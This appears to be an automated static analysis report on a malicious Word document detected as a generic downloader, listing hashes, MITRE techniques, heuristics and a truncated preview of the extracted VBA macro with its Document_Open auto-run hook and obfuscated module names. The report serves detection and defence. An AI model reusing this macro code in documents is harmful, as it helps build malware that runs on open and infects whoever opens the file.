Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 b0d13a55b6d85e90…

MALICIOUS

Office (OOXML)

Size: 195.8 KB
Created: 2019-11-01 07:42:00 UTC
Authoring application: Microsoft Office Word 12.0000
First seen: 2020-07-24
MD5: 2afb4d0c2a4500bfe05b42ff5c2ace44
SHA-1: 6ba4c3ad87e8cd8ddabedb99e87de022106ebe83
SHA-256: b0d13a55b6d85e9018c949cae55705da82ccb952da147bd5779315028c13b5d8
Risk Score: 282

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1059 Command and Scripting Interpreter
  • T1204.002 Malicious File

The sample is an OOXML document containing a VBA project with a Document_Open macro, so the code runs automatically when the document is opened. This macro executes a Shell() call, indicating an attempt to download and run a second-stage payload. The combination of an auto-executing VBA macro and a Shell() call is a strong indicator of downloader malware. No specific family could be identified.

Heuristics (6)

  • ClamAV: Doc.Downloader.Generic-8011192-0 [critical] (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Downloader.Generic-8011192-0
  • VBA project inside OOXML [medium] (OOXML_VBA, 3 related findings)
    Document contains a VBA project (VBA macros present)
  • Shell() call in VBA [critical] (OLE_VBA_SHELL)
    Shell() call in VBA
  • Document_Open macro [high] (OLE_VBA_DOCOPEN)
    Document_Open macro
  • VBA p-code auto-exec with execution tokens [high] (OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where the visible source is unavailable.
  • Embedded URL [info] (EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://schemas.openxmlformats.org/markup-compatibility/2006 — In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships — In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/math — In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing — In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/main — In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordml — In document text (OOXML body / shared strings)

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 50994 bytes
SHA-256: 11aaf8c71e7d5994c21a21bc4918c5b989c9d401655308b9eeac7d5540f8346f
Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
    jfkjg345g.skdk
End Sub

Attribute VB_Name = "jfkjg345g"
Private Type STARTUPINFO
    cb As Long
    lpReserved As String
    lpDesktop As String
    lpTitle As String
    dwX As Long
    dwY As Long
    dwXSize As Long
    dwYSize As Long
    dwXCountChars As Long
    dwYCountChars As Long
    dwFillAttribute As Long
    dwFlags As Long
    wShowWindow As Integer
    cbReserved2 As Integer
    lpReserved2 As Long
    hStdInput As Long
    hStdOutput As Long
    hStdError As Long
End Type

Private Type PROCESS_INFORMATION
    hProcess As Long
    hThread As Long
    dwProcessID As Long
    dwThreadID As Long
End Type

#If VBA7 Then
Declare PtrSafe Function ActivateKeyboardLayout Lib "user32" (ByVal HKL As LongPtr, ByVal flags As LongPtr) As LongPtr
Declare PtrSafe Function AnyPopup Lib "user32" () As LongPtr
Declare PtrSafe Function AttachThreadInput Lib "user32" (ByVal idAttach As LongPtr, ByVal idAttachTo As LongPtr, ByVal fAttach As LongPtr) As LongPtr
Declare PtrSafe Function BeginDeferWindowPos Lib "user32" (ByVal nNumWindows As LongPtr) As LongPtr
Declare PtrSafe Function BringWindowToTop Lib "user32" (ByVal hWnd As LongPtr) As LongPtr
Declare PtrSafe Sub GoodNight Lib "kernel32" Alias "Sleep" (ByVal milliseconds As LongPtr)
Declare PtrSafe Function CharToOem Lib "user32" Alias "CharToOemA" (ByVal lpszSrc As String, ByVal lpszDst As String) As LongPtr
Declare PtrSafe Function CharToOemBuff Lib "user32" Alias "CharToOemBuffA" (ByVal lpszSrc As String, ByVal lpszDst As String, ByVal cchDstLength As LongPtr) As LongPtr
Declare PtrSafe Function CharUpper Lib "user32" Alias "CharUpperA" (ByVal lpsz As String) As String
Declare PtrSafe Function CheckDlgButton Lib "user32" Alias "CheckDLGButtonA" (ByVal hDlg As LongPtr, ByVal nIDButton As LongPtr, ByVal wCheck As LongPtr) As LongPtr
Declare PtrSafe Function CheckMenuItem Lib "user32" (ByVal hMenu As LongPtr, ByVal wIDCheckItem As LongPtr, ByVal wCheck As LongPtr) As LongPtr
Declare PtrSafe Function CheckMenuRadioItem Lib "user32" (ByVal hMenu As LongPtr, ByVal un1 As LongPtr, ByVal un2 As LongPtr, ByVal un3 As LongPtr, ByVal un4 As LongPtr) As Boolean
Declare PtrSafe Function CheckRadioButton Lib "user32" Alias "CheckRadioButtonA" (ByVal hDlg As LongPtr, ByVal nIDFirstButton As LongPtr, ByVal nIDLastButton As LongPtr, ByVal nIDCheckButton As LongPtr) As LongPtr
Declare PtrSafe Function CloseClipboard Lib "user32" () As LongPtr
Declare PtrSafe Function CloseDesktop Lib "user32" (ByVal hDesktop As LongPtr) As Boolean
Declare PtrSafe Function CloseWindow Lib "user32" (ByVal hWnd As LongPtr) As LongPtr
Declare PtrSafe Function CopyIcon Lib "user32" (ByVal hIcon As LongPtr) As LongPtr
Declare PtrSafe Function CopyImage Lib "user32" (ByVal Handle As LongPtr, ByVal un1 As LongPtr, ByVal n1 As LongPtr, ByVal n2 As LongPtr, ByVal un2 As LongPtr) As LongPtr
Declare PtrSafe Function CountClipboardFormats Lib "user32" () As LongPtr
Declare PtrSafe Function CreateCaret Lib "user32" (ByVal hWnd As LongPtr, ByVal hBitmap As LongPtr, ByVal nWidth As LongPtr, ByVal nHeight As LongPtr) As LongPtr
Declare PtrSafe Function CreateIcon Lib "user32" (ByVal hInstance As LongPtr, ByVal nWidth As LongPtr, ByVal nHeight As LongPtr, ByVal nPlanes As Byte, ByVal nBitsPixel As Byte, lpANDbits As Byte, lpXORbits As Byte) As LongPtr
Declare PtrSafe Function CreateIconFromResource Lib "user32" (presbits As Byte, ByVal dwResSize As LongPtr, ByVal fIcon As LongPtr, ByVal dwVer As LongPtr) As LongPtr
Declare PtrSafe Function CreateMDIWindow Lib "user32" Alias "CreateMDIWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String, ByVal dwStyle As LongPtr, ByVal x As LongPtr, ByVal y As LongPtr, ByVal nWidth As LongPtr, ByVal nHeight As 
... (truncated)
vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 168448 bytes
SHA-256: e2bcffdf383a81e978f6e0d5f8ac8a8b3e70ed0ed7acbd3eac1b1e4fff2b7da2
Detection: ClamAV: Doc.Downloader.Generic-8011192-0
Obfuscation or payload: unlikely